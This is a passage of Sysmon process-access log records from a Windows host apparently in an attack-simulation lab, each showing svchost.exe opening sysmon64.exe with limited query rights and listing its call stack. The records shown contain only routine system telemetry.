C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3318,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3319,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3320,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3321,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3322,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3323,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3324,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3325,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 